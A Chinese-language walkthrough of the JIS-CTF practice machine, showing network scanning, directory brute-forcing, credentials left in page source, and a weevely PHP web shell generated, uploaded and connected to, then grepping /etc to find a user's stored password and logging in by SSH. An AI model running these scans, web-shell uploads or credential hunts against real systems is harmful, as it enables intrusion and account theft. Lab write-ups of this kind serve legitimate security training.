JIS-CTF 靶机渗透

渗透之JIS-CTF靶机

攻击环境

攻击机:kali(10.0.10.223)

靶机:在vmbox上(10.0.10.221)

连接设置:两台均为桥接网卡

探嗅目标

netdiscover -i eth0

_____________________________________________________________________________
   IPAt MAC Address Count Len  MAC Vendor / Hostname  
 -----------------------------------------------------------------------------
 10.20.173.143   54:bf:64:14:77:38  4 240  Unknown vendor  
 10.0.10.221     08:00:27:68:18:58  1  60  PCS Systemtechnik GmbH  
 10.0.10.1       08:19:a6:e3:bf:45  2 120  HUAWEI TECHNOLOGIES CO.,LTD 

进一步确定10.0.10.221为靶机arp-scan -l

Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
10.0.10.1	08:19:a6:e3:bf:45	HUAWEI TECHNOLOGIES CO.,LTD
10.0.10.82	e8:6a:64:02:fc:6a	(Unknown)
10.0.10.107	00:e0:4c:82:ed:6f	REALTEK SEMICONDUCTOR CORP.
10.0.10.122	04:92:26:02:04:d7	(Unknown)
10.0.10.204	c8:d9:d2:ea:02:0f	(Unknown)
10.0.10.221	08:00:27:68:18:58	CADMUS COMPUTER SYSTEMS
10.0.10.221	08:00:27:68:18:58	CADMUS COMPUTER SYSTEMS (DUP: 2)

nmap走一波nmap -sS 10.0.10.221

Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-02 12:18 CST
Nmap scan report for 10.0.10.221
Host is up (0.00016s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:68:18:58 (Oracle VirtualBox virtual NIC)

可以看到开放了22端口和80端口,那就打开浏览器看一下这个80有什么,加载有点久不知道为啥
JIS-CTF 靶机渗透_第1张图片
现在手上没有用户名密码,源码也查不出什么东西,那干脆扫目录好了dirb http://10.0.10.221/

By The Dark Raver
-----------------

START_TIME: Mon Sep  2 12:32:42 2019
URL_BASE: http://10.0.10.221/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612  

---- Scanning URL: http://10.0.10.221/ ----
==> DIRECTORY: http://10.0.10.221/admin_area/  
==> DIRECTORY: http://10.0.10.221/assets/  
==> DIRECTORY: http://10.0.10.221/css/ 
==> DIRECTORY: http://10.0.10.221/flag/
+ http://10.0.10.221/index.php (CODE:302|SIZE:1228)
==> DIRECTORY: http://10.0.10.221/js/  
+ http://10.0.10.221/robots.txt (CODE:200|SIZE:160)
+ http://10.0.10.221/server-status (CODE:403|SIZE:299) 
   
---- Entering directory: http://10.0.10.221/admin_area/ ----
^C> Testing: http://10.0.10.221/admin_area/energy

一扫就会有停不下来的意思,我们可以使用ctrl+c暂停,以为我们已经看到了我们想要的东西,扫出来一个flag文件夹,于是我们就访问10.0.10.221/flag/,得到第一个flag
JIS-CTF 靶机渗透_第2张图片

开始渗透

感觉开始没头绪,但是返回去看dirb扫描出的目录有一个admin_area目录,进去看看,虽然页面没什么有用的东西,但是我们打开页面源码的时候却得到很多有用的东西,username和password以及第二个flag

username : admin

password : 3v1l_H@ck3r

JIS-CTF 靶机渗透_第3张图片

接下来拿着这个username和password去登陆页面登陆,登陆后有一个文件上传的地方,于是我们利用weevely来生成一个木马,这个木马用于上传到靶机

weevely generate shell /root/shell.php

JIS-CTF 靶机渗透_第4张图片

然后上传,看到succee已经是上传成功

JIS-CTF 靶机渗透_第5张图片

上传木马之后就是连接木马,但是上传文件之后有将会面临修改名称或者其他操作来阻止用户访问;之前扫描目录的时候有一个robots的文件夹,里面有一个目录,uploads应该就是用来存放上传文件的,所以试着去访问一下
[外链图片转存失败(img-MC9fxGbX-1567427282976)(tu\6.png)]
[外链图片转存失败(img-cXpI31HP-1567427282976)(tu\7.png)]
发现是可以访问的,没有404,说明可以访问我们的木马,紧接着我们连接我们的木马
weevely http://10.0.10.221/uploaded_files/shell.php shell

JIS-CTF 靶机渗透_第6张图片

往上翻翻然后再ls遍历出来就可以看到flag.txt,意外的是flag.txt我们是没有权限访问的,接着看下去有一个hint.txt,打开进去拿到第三个flag,同时也提示了下一步如何操作

www-data@Jordaninfosec-CTF01:/var/www/html $ cat hint.txt
try to find user technawi password to read the flag.txt file, you can find it in a hidden file ;)

The 3rd flag is : {7645110034526579012345670}

英文翻译过来就是让我们去找technawi用户的密码然后读取flag.txt,这个东西在一个很隐蔽的地方,既然这个technawi是用户,那就看一下用户列表,technawi也在里面

JIS-CTF 靶机渗透_第7张图片

接下来就是在etc文件中搜索这个包含technawi关键字的文件了

grep -rns technawi /etc/

www-data@Jordaninfosec-CTF01:/ $ grep -rns technawi /etc/
/etc/subgid:3:technawi:165536:65536
/etc/mysql/conf.d/credentials.txt:3:username : technawi
/etc/subuid:3:technawi:165536:65536
/etc/passwd:30:technawi:x:1000:1000:technawi,,,:/home/technawi:/bin/bash
/etc/group:5:adm:x:4:syslog,technawi
/etc/group:18:cdrom:x:24:technawi
/etc/group:21:sudo:x:27:technawi
/etc/group:23:dip:x:30:technawi
/etc/group:35:plugdev:x:46:technawi
/etc/group:49:lxd:x:110:technawi
/etc/group:54:technawi:x:1000:
/etc/group:55:lpadmin:x:115:technawi
/etc/group:56:sambashare:x:116:technawi

看到了第三行,这个还是比较吸引人的一个文件,抓来看看,一抓就抓出flag,顺带了users和passwword
JIS-CTF 靶机渗透_第8张图片

The 4th flag is : {7845658974123568974185412}

username : technawi
password : 3vilH@ksor

得到了用户名和密码那就打开ssh连接,连接成功后就急着ls,但是什么都没有,仔细想想,原来打不开的flag,就是这个,往上翻出打不开flag.txt的路径然后cd就可以打开了,或者直接cat+路径+文件就好了
JIS-CTF 靶机渗透_第9张图片

总结

这一连串下来的操作也不难,同样的套路,探嗅目标然后再一步一步渗透,见招拆招,对于新手还是挺友好的,想要渗透环境的同学可以直接私聊我或者加我秋秋:804537102

你可能感兴趣的:(JIS-CTF 靶机渗透)